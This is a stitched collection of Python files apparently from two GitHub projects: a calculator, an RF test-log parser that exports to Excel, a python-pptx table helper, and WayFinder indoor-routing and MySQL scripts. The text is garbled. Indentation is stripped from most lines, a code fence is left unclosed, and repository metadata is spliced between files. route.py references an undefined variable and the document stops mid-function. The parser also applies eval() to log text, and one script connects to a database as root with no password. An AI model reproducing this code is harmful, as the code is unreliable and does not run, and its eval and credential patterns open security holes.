        # if the expression has been evaluated, reset the expression to 0
if self.bEvaluated:
self.strExpr = "0"
self.strEqua.set(self.strExpr)
self.bEvaluated = False
return
# if the last char is operator
if self.hasOp(self.strExpr[-1]):
# if there is already "." in expression, replace op with nothing
if "." in self.strExpr:
self.strExpr = self.strExpr[:-1]
            # otherwise, replace the op with "."
else:
self.strExpr = self.strExpr[:-1] + "."
        # allow each operand to carry its own decimal point, e.g. 3.2 + 6.4:
        # if the last operand (after splitting by ops) already has ".", do nothing
        elif "." in re.split(r'\+|-|\*|\/|%', self.strExpr)[-1]:
return
        # otherwise, add a decimal point to the expression
else:
self.strExpr = self.strExpr + "."
self.strEqua.set(self.strExpr)
def pressClear(self):
printLog("[I][pressClaer] The button AC has been pressed")
self.strExpr = "0"
self.strEqua.set(self.strExpr)
self.bEvaluated = False
def pressMinus(self):
printLog("[I][pressMinus] The button +/- has been pressed")
if self.strExpr[0] == "-":
self.strExpr = self.strExpr[1:]
else:
self.strExpr = "-" + self.strExpr[0:]
self.strEqua.set(self.strExpr)
def pressErase(self):
printLog("[I][pressErase] The button \u232B has been pressed")
# if the expression is single digit or something else, set to 0(default)
if len(self.strExpr) < 2:
self.strExpr = "0"
else:
self.strExpr = self.strExpr[:-1]
self.strEqua.set(self.strExpr)
# ------------------ end of method of button events -----------------------
    def isTooLarge(self):
        return len(self.strExpr) > 200
def hasOp(self, strOp):
listOps = ["+", "-", "*", "/", "%"]
        return any(op in strOp for op in listOps)
def mainloop(self):
printLog("[I][mainloop] Start the Calculator")
self.window.mainloop()
if __name__ == '__main__':
printLog("[I][__main__] Process Start")
# new an instance of a Calculator then start it
cal = Calculator()
cal.mainloop()
printLog("[I][__main__] End of process")
```
#### File: python_advance/Asynchronous/task.py
```python
import asyncio
import time
async def nested():
return 42
async def main():
# Schedule nested() to run soon concurrently
# with "main()".
task = asyncio.create_task(nested())
# "task" can now be used to cancel "nested()", or
# can simply be awaited to wait until it is complete:
print(await task)
asyncio.run(main())
print("Finish")
```
#### File: python_advance/LogParser/LTEV2.py
```python
import re
import os
import sys
import pandas as pd
import codecs
import time
import configparser
import openpyxl
from openpyxl.utils.dataframe import dataframe_to_rows
from openpyxl.styles import Font, Fill, colors
from openpyxl.formatting.rule import CellIsRule
# [Main]
g_strVersion = "3.0.0.1"
#[ParseLogPath]
g_strLogDir = "./Log/Pass"
class cLogParser:
listKey = ["Power_dBm_CH15", "Power_dBm_CH21", "Power_dBm_CH24", "Current_mA_CH15", "Current_mA_CH21", "Current_mA_CH24", "dBm_LNA_ON", "dBm_LNA_Off",
"Current_mA_3G_CH9750", "Current_mA_3G_CH2787", "Current_mA_2G_CH124", "dBm_CH9750", "dBm_CH2787", "dBm_2G_CH124", "dBm_CH124"]
listInfo, listLTE, listZigbee = [], [], []
def __init__(self):
# get directory names of TryingLog (first layer)
listSN = os.listdir(g_strLogDir)
# iterate through log files in a SN folder (second layer)
self.parseLog(listSN)
# merge data from two different log files
self.mergeLogs()
def parseLog(self, listSN):
printLog("[I][parseLog] ------- Start Parsing Log -------")
strLTEName, strZigbeeName = "GFI20_RF_LTE.log", "GFI20_RF_Zigbee.log"
try:
for strSN in listSN:
dictLTE = {
"SN" : strSN,
"dBm_CH9750" : None,
"dBm_CH2787" : None,
"dBm_2G_CH124" : None,
"Current_mA_3G_CH9750" : None,
"Current_mA_3G_CH2787" : None,
"Current_mA_2G_CH124" : None,
"dBm_CH124" : None }
dictZigbee = {
"SN" : strSN,
"Power_dBm_CH15" : None,
"Power_dBm_CH21" : None,
"Power_dBm_CH24" : None,
"dBm_LNA_ON" : None,
"dBm_LNA_Off" : None,
"Current_mA_CH15" : None,
"Current_mA_CH21" : None,
"Current_mA_CH24" : None }
b_hasLTE, b_hasZigbee = False, False # flag for checking if the target log exists
strSNLog = os.path.join(g_strLogDir, strSN) # set abspath for SN logs
for strLogName in os.listdir(strSNLog):
strLogPath = os.path.join(strSNLog, strLogName)
# check GFI20_RF_LTE.log exists. If not, flag = False and parse only SN.
reMatch = re.fullmatch("^.*RF_LTE\.log", strLogName)
if(reMatch != None):
self.parseLTE(dictLTE, strLogPath, strSN)
b_hasLTE = True
# parse GFI20_RF_Zigbee.log files
reMatch = re.fullmatch("^.*RF_Zigbee\.log", strLogName)
if(reMatch != None):
self.parseZigbee(dictZigbee, strLogPath, strSN)
b_hasZigbee = True
# if log not exists, append initial dict
self.listLTE.append(dictLTE)
self.listZigbee.append(dictZigbee)
# if there is no target log file in the folder, parse only SN
if not b_hasLTE:
#listLTE.append({"SN": strSN})
printLog("[W][ParseLog] Cannot find log: %s" % os.path.join(strSN, strLTEName))
if not b_hasZigbee:
#listZigbee.append({"SN" : strSN})
printLog("[W][ParseLog] Cannot find log: %s" % os.path.join(strSN, strZigbeeName))
printLog("[I][parseLog] ------- Finish Parsing Log -------")
except Exception as e:
printLog("[E][parseLog] Unexpected Error: " + str(e))
def parseLTE(self, dictLTE, strLTEPath, strSN):
printLog("[I][parseLTE] Parse LTE log: %s" % strLTEPath)
try:
listPostfix = [" \n", " A\n", " dBm\n"]
with open(strLTEPath, encoding='big5') as log: # big5 for windows
content = log.readlines()
for line in content:
re_power = "Power: [+-]?[0-9]+\.?[0-9]*"
re_current = "Current: [+-]?[0-9]+\.?[0-9]* A"
re_RX_RSSI = "Rx RSSI: [+-]?[0-9]+\.?[0-9]* dBm"
if re.search("-+ LTE_3G Freq 897.4 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictLTE, re_power, self.listKey[11], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictLTE, re_current, self.listKey[8], listPostfix[1], 1000, False)
if re.search("-+ LTE_3G Freq 1950 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictLTE, re_power, self.listKey[12], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictLTE, re_current, self.listKey[9], listPostfix[1], 1000, False)
if re.search("-+ LTE_2G Freq 914.8 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictLTE, re_power, self.listKey[13], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictLTE, re_current, self.listKey[10], listPostfix[1], 1000, False)
if re.search("-+ LTE_2G Freq 959.8 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictLTE, re_RX_RSSI, self.listKey[14], listPostfix[2], 1, True)
except Exception as e:
printLog("[E][parseLTE] Unexpected Error: " + str(e))
def parseZigbee(self, dictZigbee, strZigBeePath, strSN):
printLog("[I][parseZigbee] Parse Zigbee log: %s" % strZigBeePath)
try:
listPostfix = ["dBm\n", " A\n", " dBm\n"]
with open(strZigBeePath, encoding="big5") as Zigbee: # big5 for windows
content = Zigbee.readlines()
for line in content:
re_power = "Power: [+-]?[0-9]+\.?[0-9]* dBm"
re_current = "Current: [+-]?[0-9]+\.?[0-9]* A"
re_RX_RSSI = "Rx RSSI: [+-]?[0-9]+\.?[0-9]* dBm"
if re.search("-+ ZIGBEE_2450 Freq 2425 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictZigbee, re_power, self.listKey[0], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictZigbee, re_current, self.listKey[3], listPostfix[1], 1000, False)
if re.search("-+ ZIGBEE_2450 Freq 2455 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictZigbee, re_power, self.listKey[1], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictZigbee, re_current, self.listKey[4], listPostfix[1], 1000, False)
if re.search("-+ ZIGBEE_2450 Freq 2470 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictZigbee, re_power, self.listKey[2], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictZigbee, re_current, self.listKey[5], listPostfix[1], 1000, False)
if re.search("-+ LNA ON -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictZigbee, re_RX_RSSI, self.listKey[6], listPostfix[2], 1, False)
if re.search("-+ LNA OFF -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictZigbee, re_RX_RSSI, self.listKey[7], listPostfix[2], 1, False)
except Exception as e:
printLog("[E][parseZigbee] Unexpected Error: " + str(e))
def get_log_value(self, cut_content, dictInfo, re_target, strKey, strPostfix, nUnit, b_getMulti):
for line in cut_content:
# search pattern like "Power: (int/float) dBm"
if re.search(re_target, line) != None:
# get the figure of the line like "Power: 8.817 dBm\n"
fValue = eval(line.split(": ")[1].strip(strPostfix))
dictInfo[strKey] = fValue * nUnit
if not b_getMulti:
break;
# merge two list of dict to single list of dict
def mergeLogs(self):
try:
printLog("[I][mergeLogs] ------- Merging two Log data -------")
# listLTE and listZigbee both has same length
self.listInfo = [None] * len(self.listLTE)
for i in range (0, len(self.listLTE)):
self.listLTE[i].update(self.listZigbee[i]) # merge two dict
self.listInfo[i] = self.listLTE[i]
printLog("[I][mergeLogs] ------- Merged two Log data -------")
except Exception as e:
printLog("[E][mergeLogs] Unexpected Error: " + str(e))
#/====================================================================\#
#| Functions of parsing log to excel |#
#\====================================================================/#
def log_to_excel(self):
printLog("[I][log_to_excel] ------- Parsing Log to Excel -------")
        dictThreshold = {} # stores INI threshold data for setting conditional formatting
try:
# ========== get the threshold data from INI ==========
printLog("[I][log_to_excel] ----- INI reading -----")
for key in self.listKey:
dictThreshold[key] = self.readINI(key)
printLog("[I][log_to_excel] ----- INI read -----")
# ========== New Excel workbook and sheets ==========
df_logInfo = pd.DataFrame(self.listInfo) # listInfo -> list of dict
listSheetName = ["Zigbee_Power_Current", "Zigbee_LAN", "LTE_Current", "LTE_dBm"]
listCol = [self.listKey[:6], self.listKey[6:8], self.listKey[8:11], self.listKey[11:15]] # columns for each sheet above
            wb = openpyxl.Workbook() # create a new Excel workbook
wb.remove(wb['Sheet']) # remove the default sheet when start a workbook
printLog("[I][log_to_excel] ----- Excel Sheet Creating -----")
for i in range(0, len(listSheetName)):
self.newSheet(wb, listSheetName[i], df_logInfo[["SN"] + listCol[i]])
printLog("[I][log_to_excel] ----- Excel Sheet Created -----")
# modify cell font-color according to thershold that parsed from INI
self.set_threshold_to_excel(wb, dictThreshold)
wb.save('LTEV2.xlsx') # save the worksheet as excel file
printLog("[I][log_to_excel] ------- Parsed Log to Excel -------")
except Exception as e:
printLog("[E][log_to_excel] Unexpected Error: " + str(e))
# read INI values one by one by giving keys, then store to var dictThreshold
def readINI(self, strKey):
try:
config = configparser.ConfigParser()
config.read(g_strINIPath)
strMethod = 'Method%s' % g_nMethodIndex
strValue = config.get(strMethod, strKey)
# search pattern like "+-(int/float),+-(int/float)"
if re.fullmatch("[+-]?[0-9]+\.?[0-9]*,[+-]?[0-9]+\.?[0-9]*", strValue):
printLog("[I][readINI] %s = %s" % (strKey, strValue))
return strValue
else:
printLog("[W][readINI] Read %s Fail !!" % strKey)
sys.exit("Read %s Fail !!" % strKey)
except Exception as e:
printLog("[E][readINI] Error: %s" % str(e))
sys.exit("Error: %s" % str(e))
# new worksheets by DataFrame
def newSheet(self, workbook, strSheetName, df_SheetCol):
try:
workbook.create_sheet(strSheetName)
for row in dataframe_to_rows(df_SheetCol, index=False, header=True):
workbook[strSheetName].append(row)
printLog("[I][newSheet] Sheet: %s Created" % strSheetName)
except Exception as e:
printLog("[E][newSheet] Unexpected Error: " + str(e))
    # set conditional formatting on sheets from a dictionary of threshold data
def set_threshold_to_excel(self, workbook, dictThreshold):
try:
printLog("[I][set_threshold_to_excel] ----- threshold setting -----")
# iterate through every worksheet to set conditional formatting
for ws in workbook.worksheets:
printLog("[I][set_threshold_to_excel] setting worksheet: %s" % ws.title)
# iterate from Col 2 since Col 1 is the Serial Number(SN)
for col in ws.iter_cols(min_row=1, max_row=ws.max_row, min_col=2, max_col=ws.max_column):
                    strStart, strEnd = None, None # the tested cell range, e.g. A1:A10
                    listInterval = [] # the threshold interval for the formula below
# check the column is not empty, col[0] is column name
if len(col) > 1:
                        strStart = col[1].coordinate # starting cell for threshold testing
                        strEnd = col[-1].coordinate # ending cell
                        # get the threshold and store it as an interval for the formula below
                        strThreshold = dictThreshold[col[0].value] # look up the threshold by the column name (col[0])
listInterval = strThreshold.split(",")
red_text = Font(color="9C0006") # font-color: RED
range_string = "%s:%s" % (strStart, strEnd) # the value would be like A1:A10
ws.conditional_formatting.add(range_string,
CellIsRule(operator='notBetween', formula=listInterval, stopIfTrue=True, font=red_text))
printLog("[I][set_threshold_to_excel] ----- threshold set -----")
except Exception as e:
printLog("[E][set_threshold_to_excel] Unexpected Error: " + str(e))
#/====================================================================\#
#| Functions of printing log of LTE.py |#
#\====================================================================/#
def getDateTimeFormat():
strDateTime = "[%s]" % (time.strftime("%Y/%m/%d %H:%M:%S", time.localtime()))
return strDateTime
def printLog(strPrintLine):
    strFileName = os.path.basename(__file__).split('.')[0]
    fileLog = codecs.open(strFileName + ".log", 'a', "utf-8")
print(strPrintLine)
fileLog.write("%s%s\r\n" % (getDateTimeFormat(), strPrintLine))
fileLog.close()
if __name__ == "__main__":
global g_strFileName, g_strINIPath, g_nMethodIndex
g_strFileName = os.path.basename(__file__).split('.')[0]
g_strINIPath = os.path.join(os.getcwd(), g_strFileName + ".ini")
g_nMethodIndex = 1
printLog("========== Start ==========")
printLog("[I][main] Python " + sys.version)
printLog("[I][main] %s.py %s" % (g_strFileName, g_strVersion))
# ------------ find the target file --------------
try:
LogParser = cLogParser()
LogParser.log_to_excel()
except Exception as e:
printLog("[E][main] Unexpected Error: " + str(e))
printLog("========== End ==========")
```
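`readINI` expects every key in `cLogParser.listKey` under a `[Method1]` section, each value a `low,high` pair matching its regex. A hypothetical fragment of `LTEV2.ini`, written from Python for the sketch (values invented; the real file needs an entry for all fifteen keys or `readINI` exits):
```python
# Hypothetical LTEV2.ini content; values are illustrative only.
ini_text = (
    "[Method1]\n"
    "Power_dBm_CH15 = -5,5\n"
    "Power_dBm_CH21 = -5,5\n"
    "Current_mA_CH15 = 50,150\n"
    "dBm_CH9750 = -10,10\n"
)
with open("LTEV2.ini", "w") as f:
    f.write(ini_text)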
#### File: pptx/script/PPTX_FEATURE.py
```python
import os, sys
import pandas as pd
import collections
import collections.abc
# the above packages are required for importing pptx, on Python 3.10.X+
from pptx import Presentation
from pptx.util import Inches, Pt, Cm
from pptx.dml.color import RGBColor
from pptx.enum.text import PP_ALIGN, MSO_AUTO_SIZE, MSO_ANCHOR
from pptx.oxml.xmlchemy import OxmlElement
import xml.etree.ElementTree as ET
class PresentationFeature():
# new textbox and add text
@staticmethod
def add_textbox(slide, text, left=0, top=0, width=0, height=0, *, size=Pt(12)):
txBox = slide.shapes.add_textbox(Inches(left), Inches(top), width, height)
text_frame = txBox.text_frame
text_frame.word_wrap = True # for libreoffic, if not having this line, the textbox will go off the slide
p = text_frame.add_paragraph()
p.text = text
p.font.size = size
return txBox
# set text alignment inside textbox
@staticmethod
def set_textbox_alignment(textbox, horizen_type):
for paragraph in textbox.text_frame.paragraphs:
paragraph.alignment = horizen_type # set horizen alignment
# add text to a table's cell
@staticmethod
def add_text_to_cell(cell, str_text):
paragraph = cell.text_frame.paragraphs[-1]
run = paragraph.add_run()
run.text = str_text
# add text to a cell's run and new lines by the length of string_len
@staticmethod
def add_text_with_newlines(cell, list_ctry, *, string_len):
str_ctry = ""
for i in range(len(list_ctry)):
if i > 0:
str_ctry += ","
str_ctry += list_ctry[i]
if len(str_ctry) >= string_len:
paragraph = cell.text_frame.paragraphs[-1]
run = paragraph.add_run()
run.text = str_ctry + "\n"
str_ctry = ""
# setting all table cell's text size
@staticmethod
def set_table_text_size(table, *, size):
# setting font size
for col in range(len(table.columns)):
for row in range(len(table.rows)):
for cell_pt in table.cell(row, col).text_frame.paragraphs:
cell_pt.font.size = size
# setting single cell's text size
@staticmethod
def set_cell_text_size(cell, *, size):
font = cell.font
font.size = size
# set all cell's text color
@staticmethod
def set_table_text_color(table, RGBcolor):
for col in range(len(table.columns)):
for row in range(len(table.rows)):
for cell_pt in table.cell(row, col).text_frame.paragraphs:
cell_pt.font.color.rgb = RGBcolor
# new a table without formating or styling
@staticmethod
def add_table(slide, row = 0, col = 0, left = 0, top = 0):
shape = slide.shapes
left = Inches(left)
top = Inches(top)
width = height = Inches(1)
table = shape.add_table(row, col, left, top, width, height).table
return table
# construct table by given dataframe
@staticmethod
def add_table_by_df(slide, df, left = 0, top = 0):
shape = slide.shapes
left = Inches(left)
top = Inches(top)
width = height = Inches(1)
row = df.shape[0]
col = df.shape[1]
table = shape.add_table(row, col, left, top, width, height).table
for col in range(len(table.columns)):
for row in range(len(table.rows)):
table.cell(row, col).text = df.iloc[row, col]
return table
# format the column width and text size
@staticmethod
def resize_table(table, font_size):
# setting font size
for col in range(len(table.columns)):
for row in range(len(table.rows)):
for cell_pt in table.cell(row, col).text_frame.paragraphs:
cell_pt.font.size = font_size
# format the column by finding the max length run in paragraphs
list_col_max_width = [0 for x in range(len(table.columns))]
for col in range(len(table.columns)):
for row in range(len(table.rows)):
for paragraphs in table.cell(row, col).text_frame.paragraphs:
for run in paragraphs.runs:
list_col_max_width[col] = max(list_col_max_width[col], len(run.text)*(font_size))
# setting column width
for col in range(len(table.columns)):
table.columns[col].width = list_col_max_width[col] + Cm(0.25)
# set multiple column width with corresponding given value
@staticmethod
def set_column_width(table, list_col_idx, list_width):
for col in list_col_idx:
table.columns[col].width = list_width[col]
# set cell text alignment by table
@staticmethod
def set_table_alignment(table, horizen_type, vertical_type):
for row in range(len(table.rows)):
for col in range(len(table.columns)):
table.cell(row, col).vertical_anchor = vertical_type # set vertical alignment
for paragraph in table.cell(row, col).text_frame.paragraphs:
paragraph.alignment = horizen_type # set horizen alignment
# fill cell background
@staticmethod
def set_cell_fill(table, list_cell_coord, RGBcolor):
for row, col in list_cell_coord:
cell = table.cell(row, col)
fill = cell.fill
fill.solid()
fill.fore_color.rgb = RGBcolor
# fill table(all-cell) background
@staticmethod
def set_table_fill(table, RGBcolor):
for row in range(len(table.rows)):
for col in range(len(table.columns)):
cell = table.cell(row, col)
fill = cell.fill
fill.solid()
fill.fore_color.rgb = RGBcolor
# print table value
@staticmethod
def print_table(table):
for row in range(len(table.rows)):
for col in range(len(table.columns)):
print(table.cell(row, col).text_frame.text, end=" ")
print()
# new xml element to set style
@staticmethod
def SubElement(parent, tagname, **kwargs):
element = OxmlElement(tagname)
element.attrib.update(kwargs)
parent.append(element)
return element
# set border style by modifying xml
@classmethod
def set_table_border(cls, table, border_color="444444", border_width='12700'):
for row in range(len(table.rows)):
for col in range(len(table.columns)):
cell = table.cell(row, col)
tc = cell._tc # <class 'pptx.oxml.table.CT_TableCell'> as a xml element
tcPr = tc.get_or_add_tcPr() # <class 'pptx.oxml.table.CT_TableCellProperties'> as a xml element
for lines in ['a:lnL','a:lnR','a:lnT','a:lnB']:
ln = cls.SubElement(tcPr, lines, w=border_width, cap='flat', cmpd='sng', algn='ctr')
solidFill = cls.SubElement(ln, 'a:solidFill')
srgbClr = cls.SubElement(solidFill, 'a:srgbClr', val=border_color)
prstDash = cls.SubElement(ln, 'a:prstDash', val='solid')
round_ = cls.SubElement(ln, 'a:round')
headEnd = cls.SubElement(ln, 'a:headEnd', type='none', w='med', len='med')
tailEnd = cls.SubElement(ln, 'a:tailEnd', type='none', w='med', len='med')
# set dblstrike on run tag by xml
@classmethod
def set_dblstrike(cls, table, list_run_text):
for row in range(len(table.rows)):
for col in range(len(table.columns)):
for paragraphs in table.cell(row, col).text_frame.paragraphs:
for run in paragraphs.runs:
if run.text in list_run_text:
r = run._r
rPr = cls.SubElement(r, 'a:rPr', strike="dblStrike")
# find the rPr tag with dblStrike attrib under run, then return a list of quilfied run-text
@staticmethod
def find_dblstrike(table):
namespaces = {'a': 'http://schemas.openxmlformats.org/drawingml/2006/main'}
list_run_text = []
for row in range(len(table.rows)):
for col in range(len(table.columns)):
cell = table.cell(row, col)
tc = cell._tc
list_rPr = tc.findall('.//a:rPr[@strike="dblStrike"]', namespaces)
for rPr in list_rPr:
r = rPr.find('..')
t = r.find('.//a:t', namespaces)
list_run_text.append(t.text)
return list_run_text
# set table color that the srchClr val is not "000000"
@classmethod
def set_color(cls, table, dict_run_text):
for row in range(len(table.rows)):
for col in range(len(table.columns)):
for paragraphs in table.cell(row, col).text_frame.paragraphs:
for run in paragraphs.runs:
if run.text in dict_run_text.keys():
r = run._r
rPr = r.get_or_add_rPr()
solidFill = cls.SubElement(rPr, 'a:solidFill')
srgbClr = cls.SubElement(solidFill, 'a:srgbClr', val=dict_run_text[run.text])
# find the run's color that is not "000000" and return that color and text as dict
@staticmethod
def find_color(table):
namespaces = {'a': 'http://schemas.openxmlformats.org/drawingml/2006/main'}
dict_run_text = {}
for row in range(len(table.rows)):
for col in range(len(table.columns)):
for paragraphs in table.cell(row, col).text_frame.paragraphs:
for run in paragraphs.runs:
r = run._r
srgbClr = r.find('.//a:srgbClr', namespaces)
if srgbClr.attrib["val"] != "000000":
t = r.find('.//a:t', namespaces)
dict_run_text[t.text] = srgbClr.attrib["val"]
return dict_run_text
# copy table value by runs
@staticmethod
def copy_table_value(dst_table, src_table):
for row in range(len(src_table.rows)):
for col in range(len(src_table.columns)):
for paragraph in src_table.cell(row, col).text_frame.paragraphs:
dst_p = dst_table.cell(row, col).text_frame.add_paragraph()
for run in paragraph.runs:
dst_run = dst_p.add_run()
dst_run.text = run.text
# output a table's xml file
@classmethod
def print_table_xml(cls, table, table_name, path=os.getcwd()):
with open(table_name + "_table.xml", "w") as f:
f.write(str(table._tbl.xml))
``` |
{
"source": "a22057916w/WayFinder",
"score": 3
} |
#### File: py_src/Mysql/dumpJson.py
```python
import mysql.connector
import json
import re
from math import sin, cos, sqrt, atan2, radians
import sys
# Adding the path of self-def Library
sys.path.append("C:/Users/A02wxy/Documents/GitHub/WayFinder/Direction/Library/script/")
from featureCollection import Feature, Vertex
from readGeojson import readAllGeojson
def MYSQL_DUMP_JSON():
mydb = mysql.connector.connect(
host="192.168.127.12",
user="root",
database="WayFinder"
)
mycursor = mydb.cursor()
# read all geoJson data
geoSource = readAllGeojson()
for i in range(0, len(geoSource)):
floor = "sf_" + str(i + 1) + "f"
# initiating features from geoJson Data
floorData = geoSource[i]
floorFeatures = floorData["features"]
features = []
for feature in floorFeatures:
Afeature = Feature(feature)
features.append(Afeature)
# checking if table exists
sql_checkTable = "SHOW TABLES LIKE %s"
mycursor.execute(sql_checkTable, (floor, ))
result = mycursor.fetchone()
if result == None:
sql_create = "CREATE TABLE " + floor + "(type VARCHAR(255), id VARCHAR(255), name VARCHAR(255), multi_door int(255), door VARCHAR(255), vertex VARCHAR(255), vertex_id VARCHAR(255))"
mycursor.execute(sql_create)
else:
sql_delete = "DELETE FROM " + floor
mycursor.execute(sql_delete)
# Updating mysql data from features
sql = "INSERT INTO " + floor + "(type, id, name, multi_door, door, vertex, vertex_id) VALUES (%s, %s, %s, %s, %s, %s, %s)"
for feature in features:
type = feature.getType()
id = feature.getID()
name = feature.getName()
mutil_door = feature.getMutilDoors()
door = str(feature.getDoor())
vertex = str(feature.getVertex())
vertex_id = str(feature.getVertexID())
val = (type, id, name, mutil_door, door, vertex, vertex_id)
mycursor.execute(sql, val)
mydb.commit()
mydb.close()
MYSQL_DUMP_JSON()
```
#### File: py_src/Mysql/dumpPoster.py
```python
import mysql.connector
import json
import re
import pandas as pd
import pymysql
from sqlalchemy import create_engine
import sys
# Adding the path of self-def Library
sys.path.append("C:/Users/A02wxy/Documents/GitHub/WayFinder/Direction/Library/script/")
from featureCollection import Feature, Vertex
from myio import read_excel
from mysqlCoon import MY_ENGINE
def MYSQL_DUMP_POSTER():
# ====== Connection ====== #
# Connecting to mysql by providing a sqlachemy engine
engine = MY_ENGINE()
# dump dist excel to mysql
floorNumber = 9
for i in range(0, 9):
fileName = "C:\\Users\\A02wxy\\Documents\\GitHub\\WayFinder\\Direction\\Route\\poster\\sf" + str(i + 1) + "f_poster.xlsx"
tableName = "sf" + str(i + 1) + "f_poster"
df = read_excel(fileName)
df.to_sql(name = tableName, if_exists="replace", con = engine, index = False)
MYSQL_DUMP_POSTER()
```
#### File: WayFinder/py_src/route.py
```python
import mapbox
import json
from math import sin, cos, sqrt, atan2, radians
import sys
# Adding the path of self-def Library
sys.path.append("C:/Users/A02wxy/Documents/GitHub/WayFinder/Direction/Library/script/")
from featureCollection import Feature, Vertex, Poster
from readGeojson import readAllGeojson
from weight import getWeight
from myio import save
# all pairs shortest path alogrithm
def Floyd_Warshall(weight):
    w = weight # a weighted adjacency matrix
    n = len(w[0]) # w is n x n
    d = [[0 for i in range(n)] for j in range(n)] # shortest path lengths
    next = [[0 for i in range(n)] for j in range(n)] # next[i][j] is the second vertex on the path from i to j
for i in range(0, n):
for j in range(0, n):
d[i][j] = w[i][j]
next[i][j] = j
for i in range(0, n):
d[i][i] = 0
    for k in range(0, n): # try every intermediate vertex
        for i in range(0, n): # relax every pair (i, j)
for j in range(0, n):
if d[i][k] + d[k][j] < d[i][j]:
d[i][j] = d[i][k] + d[k][j]
                    # the second vertex on the path i -> j is exactly
                    # the second vertex on the path i -> k.
                    next[i][j] = next[i][k]
totNext = [[None for i in range(n)] for j in range(n)]
for i in range(0, n):
for j in range(0, n):
totNext[i][j] = find_path(i, j, next)
return d, next, totNext
# collect the intermediate vertices on the shortest path from s to t
def find_path(s, t, next):
middle = []
i = s
while i != t:
i = next[i][t]
middle.append(i)
return middle
def getRoute(collection, targetCollection):
# assigning the variables
dist = collection["dist"]
targetDist = targetCollection["dist"]
sn = len(dist[0])
tn = len(targetDist[0])
n = max(sn, tn)
route = [[1E9 for i in range(n)] for j in range(n)]
EID = [[None for i in range(n)] for j in range(n)] # record which elevator it takes
for i in range(0, sn):
for j in range(0, tn):
route[i][j], EID[i][j] = getDistanceAndElevator(collection, targetCollection, i, j)
return route, EID
def getDistanceAndElevator(collection, targetCollection, s, e):
# assigning the variables
dist = collection["dist"]
elevators = collection["elevators"]
vertexes = collection["vertexes"]
targetDist = targetCollection["dist"]
targetElevators = targetCollection["elevators"]
targetVertex = targetCollection["vertexes"]
# create a hashmap<string, integer>(<VID, index>)
EVID = {}
for elevator in elevators:
VID = elevator.getVertexID()[0]
for vertex in vertexes:
if vertex.getID() == VID:
EVID[VID] = vertex.getIndex()
break
TEVID = {}
for elevator in targetElevators:
TVID = elevator.getVertexID()[0]
for vertex in targetVertex:
if vertex.getID() == TVID:
TEVID[TVID] = vertex.getIndex()
break
# calculating the route across floors
spe = 1E9 # starting point to elevator
tpe = 1E9 # target point to elevator
totDist = 1E9
EID = None # record the elevator's id
for elevator in elevators:
VID = elevator.getVertexID()[0]
spe = dist[s][EVID[VID]]
EID = elevator.getID()
# find the same elevator on different floor
for targetElevator in targetElevators:
if targetElevator.getName() == elevator.getName():
TVID = targetElevator.getVertexID()[0]
tpe = targetDist[e][TEVID[TVID]]
if totDist > spe + tpe:
totDist = spe + tpe
EID = targetElevator.getID()
break
else:
continue
return totDist, EID
def parseSave(totDist, totElev, floorVertex, floorNext, floorRouteCoord, floorRouteRot):
floorNumber = len(totDist) # len(totDist) gets floor counts
# parse and save each floor as a file for dist and next
"""for i in range(0, floorNumber):
fileDist = "C:/Users/A02wxy/Documents/GitHub/WayFinder/Direction/Route/dist/sf" + str(i + 1) + "f_dist"
dist = [] # for saving dist to each floor from floor[i]
# parsing the dist data
for j in range(0, floorNumber):
for k in range(0, len(totDist[i][j])):
for l in range(0, len(totDist[i][j][k])):
dist.append({
"floor": str(j),
"start": str(k),
"dest": str(l),
"dist": totDist[i][j][k][l],
"Elevator": totElev[i][j][k][l]
})
save(dist, fileDist) # saving using myio function
# parsing the next(middle points) data and save
for i in range(0, floorNumber):
fileNext = "C:/Users/A02wxy/Documents/GitHub/WayFinder/Direction/Route/next/sf" + str(i + 1) + "f_next"
middle = [] # for saving middle points between the route only on floor[i]
for j in range(0, len(floorNext[i])):
for k in range(0, len(floorNext[i][j])):
middle.append({
"start": str(j),
"dest": str(k),
"next": floorNext[i][j][k],
"coordinate": floorRouteCoord[i][j][k],
"rotation": floorRouteRot[i][j][k]
})
save(middle, fileNext) # saving using myio function
#store each floor's vertexes
for i in range(0, floorNumber):
fileName = "C:/Users/A02wxy/Documents/GitHub/WayFinder/Direction/Route/vertex/sf" + str(i + 1) + "f_vertex"
vertexes = []
for vertex in floorVertex[i]:
vertexes.append({
"ID": vertex.getID(),
"_index_": vertex.getIndex(),
"inct": vertex.getInct(),
"coordinate": vertex.getCoordinate(),
"rotation": vertex.getRotation()
})
save(vertexes, fileName)"""
# store each floor's poster
for i in range(0, floorNumber):
fileName = "C:/Users/A02wxy/Documents/GitHub/WayFinder/Direction/Route/poster/sf" + str(i + 1) + "f_poster"
posters = []
for poster in floorPoster[i]:
posters.append({
"ID": poster.getID(),
"coordinate": poster.getCoordinate(),
"vertex_id": poster.getVertexID(),
"rotation": poster.getRotation()
})
save(posters, fileName)
if __name__ == "__main__":
geoSource = readAllGeojson()
floorNumber = len(geoSource)
# initializing each floor's data
floorData = []
for i in range(0, floorNumber):
floorData.append(geoSource[i])
# initializing each floor's feature with two dim list
floorFeatures = []
for i in range(0, floorNumber):
features = []
for feature in floorData[i]["features"]:
features.append(Feature(feature))
floorFeatures.append(features)
# initializing each floor's vertexes
floorVertex = []
for i in range(0, floorNumber):
index = 0
vertex = []
for feature in floorFeatures[i]:
if feature.getType() == "point":
vertex.append(Vertex(feature.getFeature(), index))
index += 1
floorVertex.append(vertex)
# initializing each floor's elevators
floorElevators = []
for i in range(0, floorNumber):
